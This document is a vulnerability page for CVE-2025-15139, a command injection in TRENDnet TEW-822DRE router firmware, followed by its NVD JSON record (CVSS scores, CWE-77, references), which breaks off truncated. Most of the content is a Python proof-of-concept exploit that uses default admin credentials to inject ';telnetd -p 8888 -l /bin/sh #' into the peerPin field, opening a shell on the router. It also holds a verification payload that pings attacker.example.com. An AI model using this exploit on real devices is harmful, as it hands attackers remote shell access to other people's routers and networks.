CVE-2025-15139

import requests # CVE-2025-15139 PoC - TRENDnet TEW-822DRE Command Injection # Target: TRENDnet TEW-822DRE firmware 1.00B21/1.01B06 target_ip = "192.168.10.1" # Default router IP target_url = f"http://{target_ip}/boafrm/formWsc" # Malicious payload - injects command to create a reverse shell # The peerPin parameter is vulnerable to command injection malicious_pin = ";telnetd -p 8888 -l /bin/sh #" def exploit_command_injection(): """ Exploit the command injection vulnerability in TRENDnet TEW-822DRE via the peerPin parameter in /boafrm/formWsc """ # Authentication credentials (default or compromised) auth = ('admin', 'admin') # Default credentials often unchanged # Construct the malicious request data = { 'peerPin': malicious_pin, 'submit': 'WPS', 'wps_mode': '1' } try: response = requests.post(target_url, data=data, auth=auth, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Payload: {malicious_pin}") print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[+] Exploit request completed") print("[+] Check if telnet server is running on port 8888") else: print("[-] Unexpected response") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def verify_vulnerability(): """ Verify if the target is vulnerable by checking for command injection """ # Test with simple ping command to verify injection verify_payload = ";ping -c 3 attacker.example.com #" data = { 'peerPin': verify_payload, 'submit': 'WPS', 'wps_mode': '1' } try: response = requests.post(target_url, data=data, auth=auth, timeout=10) print(f"[*] Verification payload sent") except Exception as e: print(f"[-] Error during verification: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-15139 - TRENDnet TEW-822DRE Command Injection") print("=" * 60) verify_vulnerability() exploit_command_injection()

{"cve": {"id": "CVE-2025-15139", "sourceIdentifier": "[email protected]", "published": "2025-12-28T14:16:27.603", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in TRENDnet TEW-822DRE 1.00B21/1.01B06. This affects the function sub_43ACF4  of the file /boafrm/formWsc. Such manipulation of the argument peerPin leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:trendnet:tew-822dre_firmware:1.00b21:*:*:*:*:*:*:*", "matchCriteriaId": "6C6E71C2-9372-445D-AB85-AE8A3354A13F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:trendnet:tew-822dre_firmware:1.01b06:*:*:*:*:*:*:*", "matchCriteriaId": "2C85CFF6-AA4B-4BC9-BA11-0CF0FF4F0941"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:trendnet:tew-822dre:-:*:*:*:*:*:*:*", "matchCriteriaId": "C96E1973-C97A-4B75-824D-6EAE4CFA3694"}]}]}], "references": [{"url": "https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-822DRE-Command-Injection-2c9e5dd4c5a580f190e9c411ad627e9a#2c9e5dd4c5a5801dae7ad20828639d4b", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338517", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338517", "source": "[email protected]", "tags": ["Third Party Advisory" ... (truncated)